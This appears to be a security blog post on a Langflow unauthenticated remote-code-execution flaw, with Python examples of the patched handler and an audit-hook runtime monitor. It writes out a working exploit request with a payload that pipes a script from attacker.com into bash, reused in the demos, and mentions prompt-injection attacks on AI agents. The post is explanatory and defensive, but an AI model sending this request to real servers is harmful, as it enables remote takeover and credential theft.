Last week, a critical RCE dropped for Langflow (CVE-2026-33017). By the time most developers read the advisory, active exploitation had already been running for 20 hours.
No public PoC existed. Attackers read the advisory description, built working exploits from scratch, and started scanning the internet for vulnerable instances — all before most teams could schedule a patching window.
This is becoming the normal timeline for AI infrastructure CVEs.
What happened
The bug lives in /api/v1/build_public_tmp/{flow_id}/flow. This endpoint is intentionally unauthenticated: it's designed to serve public flows without login. But it also accepts an optional data field in the JSON request body that lets callers supply their own flow definition in place of the stored one.
That flow definition can contain arbitrary Python code in the node definitions (the template.code.value of a node, as in the request below). The server passes it to exec() with zero sandboxing.
One HTTP POST request. No authentication. Arbitrary code running with the privileges of the Langflow server process.
curl -X POST https://your-langflow-instance.com/api/v1/build_public_tmp/{flow_id}/flow \
-H "Content-Type: application/json" \
-d '{"data": {"nodes": [{"data": {"node": {"template": {"code": {"value": "import os; os.system(\"curl attacker.com/shell.sh | bash\")"}}}}}]}}'
Once in, attackers extracted environment variables, API keys, database credentials, and set up reverse shells. Sysdig confirmed supply chain compromise of downstream pipelines.
This is Langflow's second critical RCE with the same root cause
CVE-2025-3248 (CVSS 9.8) hit the same exec() call via a different endpoint. That bug is already on CISA's Known Exploited Vulnerabilities list.
Same root cause. New endpoint. Different CVE.
The researcher who found CVE-2026-33017 described the fix clearly: "The real fix is removing the data parameter from the public endpoint entirely, so public flows can only execute their stored (server-side) flow data and never accept attacker-supplied definitions."
The patch (dev version 1.9.0.dev8) does exactly that.
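To make the fix concrete, here is the pre-patch and post-patch decision modelled in plain Python. This is an added example, not Langflow's route code and not the 1.9.0.dev8 patch: the real handler is a FastAPI route, and this strips it down to the one question that matters, whether the unauthenticated build may use a flow definition from the request body or only the flow stored server-side. The flow store, the HTTPError class, the function names and the node_code() walker are assumptions for illustration, and node code is returned rather than exec()ed so the example is safe to run.

```python
"""Vulnerable vs. hardened 'build public flow' handler, modelled in plain Python.

Added example. Not Langflow's code and not the 1.9.0.dev8 patch; the flow
store, HTTPError and the function names are assumptions. Node code is
returned, never executed.
"""
from __future__ import annotations

from typing import Any, Iterator

# Constructed stand-in for the server-side store of published public flows.
PUBLIC_FLOW_STORE: dict[str, dict[str, Any]] = {
    "flow-123": {
        "nodes": [
            {"data": {"node": {"template": {"code": {"value": "def run(x):\n    return x * 2"}}}}}
        ]
    }
}

# Constructed request body in the shape of the article's curl command.
ATTACKER_BODY: dict[str, Any] = {
    "data": {
        "nodes": [
            {"data": {"node": {"template": {"code": {
                "value": 'import os; os.system("curl attacker.com/shell.sh | bash")'
            }}}}}
        ]
    }
}


class HTTPError(Exception):
    """Stand-in for the framework's HTTP error response."""

    def __init__(self, status: int, detail: str) -> None:
        super().__init__(f"{status} {detail}")
        self.status = status


def node_code(flow: dict[str, Any]) -> Iterator[str]:
    """Yield every Python source string a build of this flow would hand to exec().

    Also usable on its own against captured request bodies:
    node_code(body["data"]) lists the code an attacker is trying to run.
    """
    for node in flow.get("nodes", []):
        if not isinstance(node, dict):
            continue
        template = node.get("data", {}).get("node", {}).get("template", {})
        value = template.get("code", {}).get("value")
        if isinstance(value, str):
            yield value


def build_public_flow_vulnerable(flow_id: str, body: dict[str, Any]) -> list[str]:
    """Pre-patch logic: a client-supplied `data` flow overrides the stored flow."""
    flow = body.get("data") or PUBLIC_FLOW_STORE.get(flow_id)
    if flow is None:
        raise HTTPError(404, "flow not found")
    return list(node_code(flow))  # the real server exec()s each of these


def build_public_flow_fixed(flow_id: str, body: dict[str, Any]) -> list[str]:
    """Post-patch logic: the unauthenticated route builds only the stored flow.

    Rejecting a body that still carries `data`, rather than silently ignoring
    it, is this example's own choice: it makes the probe visible as a 400.
    """
    if "data" in body:
        raise HTTPError(400, "public builds do not accept a flow definition")
    flow = PUBLIC_FLOW_STORE.get(flow_id)
    if flow is None:
        raise HTTPError(404, "flow not found")
    return list(node_code(flow))


if __name__ == "__main__":
    print("vulnerable:", build_public_flow_vulnerable("flow-123", ATTACKER_BODY))
    try:
        build_public_flow_fixed("flow-123", ATTACKER_BODY)
    except HTTPError as err:
        print("fixed:", err)
    print("fixed, no data:", build_public_flow_fixed("flow-123", {}))
```

The vulnerable version hands the attacker's string straight through; the fixed version never reads a definition from the request at all, which is exactly the property the researcher's one-line fix description asks for. The node_code() walker doubles as a cheap detection primitive over captured request bodies for this endpoint: any non-empty result from an unauthenticated client is a probe worth alerting on.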
The pattern showing up in March 2026 alone
This isn't isolated. Look at what's happened to AI infrastructure this month:
- LiteLLM supply chain — malicious packages with exec(b64decode) obfuscation
- ShadowPrompt — zero-click prompt injection in Claude's Chrome extension via XSS
- OpenClaw CVE-2026-25253 — one-click RCE, 42,900 instances exposed
- Perplexity Comet — file theft via malicious calendar invite (zero user interaction)
- Zenity's RSAC demos — live exploitation of Cursor, Salesforce Agentforce, ChatGPT, Copilot
At RSAC this week, Zenity's CTO Michael Bargury had a phrase I keep thinking about:
"AI is just gullible. We're trying to shift the mindset from 'prompt injection' — because it's a very technical term — and convince people that this is actually just persuasion. I'm just persuading the AI agent that it should do something else."
That framing matters. Trained guardrails can be "persuaded." Runtime enforcement can't.
Why 20 hours is the new attack window
Two things changed:
AI infrastructure became production infrastructure. Langflow isn't a toy — it's running enterprise AI pipelines, handling customer data, connected to databases and downstream services. Attackers know this.
The advisory is the PoC. A well-written vulnerability advisory tells you what the vulnerable parameter is, what the vulnerable code path does, and where the patch lives. That's enough to build a working exploit in a few hours if you know what you're doing.
The old assumption — "we have a few days between disclosure and exploitation" — doesn't hold for AI infrastructure.
What actually stops this
Model-level guardrails don't prevent network-level exploits. Prompt injection filtering doesn't catch exec() injection in a Python process.
What works: monitoring what your AI pipeline actually does at runtime.
- What environment variables is it reading?
- What external URLs is it calling?
- What processes is it spawning?
- What files is it writing?
If you don't have visibility into these at runtime, you're not slow on security. You're blind.
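What that visibility looks like from inside the Python process itself, as an added example that is neither ClawMoat nor Langflow code: CPython's sys.addaudithook() reports process spawns, outbound connections, file opens and exec() of source code to a hook, so a monitor can answer three of the four questions above and refuse the spawn that the published payload ends up in. The RuntimeMonitor class, the run_node_code() stand-in for the vulnerable build path and the event-to-category mapping are this example's own; reads of environment variables do not raise an audit event, so that question needs a different sensor (a wrapper around os.environ, or host-level tracing).

```python
"""In-process behaviour monitor built on sys.addaudithook().

Added example, not ClawMoat or Langflow code. Records spawns, network
targets, file writes and exec() of string source; blocks spawns when asked.
Class and function names are this example's own.
"""
from __future__ import annotations

import os
import sys
import time
from typing import Any

# Audit event names are CPython's; the grouping into categories is ours.
SPAWN_EVENTS = frozenset({"os.system", "subprocess.Popen", "os.exec", "os.posix_spawn", "os.spawn"})
NETWORK_EVENTS = frozenset({"socket.connect", "socket.getaddrinfo", "urllib.Request"})
WRITE_FLAGS = os.O_WRONLY | os.O_RDWR | os.O_APPEND | os.O_CREAT | os.O_TRUNC


class RuntimeMonitor:
    """Collects security-relevant audit events; refuses process spawns if asked."""

    def __init__(self, block_spawn: bool = True) -> None:
        self.block_spawn = block_spawn
        self.records: list[dict[str, Any]] = []
        self._installed = False

    def install(self) -> None:
        # An audit hook cannot be removed for the life of the interpreter.
        if not self._installed:
            sys.addaudithook(self._hook)
            self._installed = True

    def _log(self, kind: str, detail: str) -> None:
        self.records.append({"ts": time.time(), "kind": kind, "detail": detail})

    def _hook(self, event: str, args: tuple) -> None:
        if event in SPAWN_EVENTS:
            # "What processes is it spawning?"  args[0] is the command/executable.
            self._log("process", f"{event} {args[0]!r}")
            if self.block_spawn:
                raise RuntimeError(f"runtime policy: blocked {event}")
        elif event == "open":
            # "What files is it writing?"  args = (path, mode, flags);
            # mode is None for os.open(), so decide on the O_* flags.
            path, _mode, flags = args[0], args[1], args[2]
            if flags & WRITE_FLAGS:
                self._log("file_write", repr(path))
        elif event in NETWORK_EVENTS:
            # "What external URLs is it calling?"  socket.connect passes (sock, address).
            target = args[1] if event == "socket.connect" else args[0]
            self._log("network", f"{event} {target!r}")
        elif event == "exec":
            # exec("...") compiles to a code object whose filename is "<string>";
            # code from an imported module carries its real path, so this
            # heuristic singles out source that arrived at runtime.
            code = args[0]
            if getattr(code, "co_filename", "") == "<string>":
                self._log("exec_source", "names=" + ",".join(code.co_names))


def run_node_code(monitor: RuntimeMonitor, source: str) -> str:
    """Do what the vulnerable build path does (exec attacker-controlled source)
    under the monitor. Returns 'blocked' if a spawn was refused, else 'ran'."""
    monitor.install()
    try:
        exec(source, {})  # deliberately the vulnerable pattern under test
    except RuntimeError as exc:
        if str(exc).startswith("runtime policy:"):
            return "blocked"
        raise
    return "ran"


if __name__ == "__main__":
    mon = RuntimeMonitor(block_spawn=True)
    payload = 'import os; os.system("curl attacker.com/shell.sh | bash")'
    print(run_node_code(mon, payload))
    for rec in mon.records:
        print(rec["kind"], rec["detail"])
```

Two caveats a practitioner would want. First, this lives in the same process as the attacker's code: it raises the bar and gives you telemetry, but a payload that uses ctypes or a native extension never passes through the audit machinery, so pair it with host-level monitoring rather than relying on it alone. Second, the exec_source heuristic keys on the "<string>" filename; legitimate dynamic code paths in a framework will show up too, so tune by co_names (an exec'd snippet that references os and system is the signal here) before turning records into alerts.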
ClawMoat is an open-source runtime security layer for AI agents — supply chain scanning, secret detection, network egress logging, and behavior monitoring. github.com/darfaz/clawmoat
Affected versions: Langflow ≤ 1.8.1
Patch: 1.9.0.dev8 (development), stable release pending
CVE: CVE-2026-33017 (CVSS 9.3)